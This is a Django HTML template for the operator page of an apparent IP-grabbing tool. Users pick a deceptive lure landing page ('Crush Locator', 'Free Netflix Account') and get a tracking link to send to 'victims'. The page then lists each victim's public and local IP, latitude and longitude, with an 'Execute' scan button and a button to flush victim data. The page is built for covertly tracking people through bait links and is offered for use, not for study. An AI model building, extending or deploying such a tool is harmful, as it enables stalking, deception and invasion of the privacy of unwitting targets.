{% extends "base.html" %} {% block content %}

{% if request.user.profile.darkmode %}

  <script>
    var options = {
    bottom: '64px', // default: '32px'
    right: 'unset', // default: '32px'
    left: '32px', // default: 'unset'
    time: '0.5s', // default: '0.3s'
    mixColor: '#fff', // default: '#fff'
    backgroundColor: '#fff',  // default: '#fff'
    buttonColorDark: '#100f2c',  // default: '#100f2c'
    buttonColorLight: '#fff', // default: '#fff'
    saveInCookies: true, // default: true,
    label: '🌓', // default: ''
    autoMatchOsTheme: true // default: true
  }
  const darkmode = new Darkmode(options);
  </script>

  {% endif %}

<style>

  body, html {
    height: 100%;
    background-repeat: no-repeat;
}
  .masthead {
  height: 80vh;
  min-height: 500px;
  background-size: cover;
  background-position: center;
  background-repeat: no-repeat;
}
</style>

{% if get %}

<header class="masthead sticky-top"><br>
  <div class="container h-100">
    <div class="row h-100 align-items-center">
      <br>
      <div class="jumbotron">
        <h1 class="display-4 text-center"><strong>Tracker</strong></h1>
        <br>
        <p class="lead text-center">Track your victims by generating a dynamic URL that will grab your victims IP address and display thier information.</p>
        <hr class="my-4">
        <div class="text-center">
            <form name="searchform" method="POST" action="" > {% csrf_token %}
            <p class="card-text">Choose Template for Victim Landing Page</p>
            <div class="dropdown">
              <select class="btn btn-secondary dropdown-toggle" name="template" type="button" id="dropdownMenuButton" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
              <div class="dropdown-menu" aria-labelledby="dropdownMenuButton">
                <option class="dropdown-item" value="0">Crush Locator</option>
                <option class="dropdown-item" value="1">Free Netflix Account</option>
              </div></select>
            </div>
            <br>
            <input class="btn btn-primary btn-lg" id="searchsubmit" value="Start Tracking" type="submit"></input>
          </form>
        </div>
      </div>
  </div>
</header>


{% endif %}

<center>

  {% if url %}

  <br>
  <div class="card text-center">
    <div class="card-header">
      Tracking URL
    </div>
    <div class="card-body" >
      
          <p class="card-text"><strong>Copy this : </strong> {{url}}</p>
    </div>
    </div>

{% endif %}

{% if victim %}
  <br>
<div class="card mb-4 shadow-sm">
  <div class="card-header">
    <h5 class="my-0 font-weight-normal"><center>Victim Track Records</center></h5>
  </div>
<br>
<div class="table-responsive table-body">
  <table class="table table-hover table-striped table-light">
    <thead>
      <tr>
        <th class="col-md-3" scope="col">Public IP</th>
        <th class="col-md-3" scope="col">Local IP</th>
        <th class="col-md-3" scope="col">Latitude</th>
        <th class="col-md-3" scope="col">Longitude</th>
        <th class="col-md-3" scope="col">Scan</th>
      </tr>
    </thead>
    <tbody>

    {% for victims in victim %}
      <tr>
      <th scope="row">{{victims.0}}</th>               
      <td>{{victims.1}}</td>
      <td>{{victims.2}}</td>
      <td>{{victims.3}}</td>

      {% load extras %}

      <form name="searchform" method="POST" action="/" > {% csrf_token %}
       
        {% define victims.0 as publicip %}
        {% defines victims.2 as latitude %}
        {% defines victims.3 as longitude %}
         
        <input hidden name="query" id="query" value="{{publicip|add:latitude|add:longitude}}"> 
      <td><button type="submit" value="query" class="btn btn-primary btn-sm">Execute</button></td>
      </form>
      </tr>
    {% endfor %}
    </tbody>
  </table>
</div>
</div>
<form method="POST" action=""> {% csrf_token %}
  <input type="submit" width="100px" id="flush" name="flush" value="Flush" onclick="Confirm()" class="btn btn-danger"></input>
  <script> 
        function Confirm() { 
            var result = confirm("Do you want to flush all Victim Data?"); 
            if (result == true) { 
                document.getElementById("flush").value = "Confirm";
            } 
        } 
  </script>
</form>
{% endif %}

</center>

{% endblock %}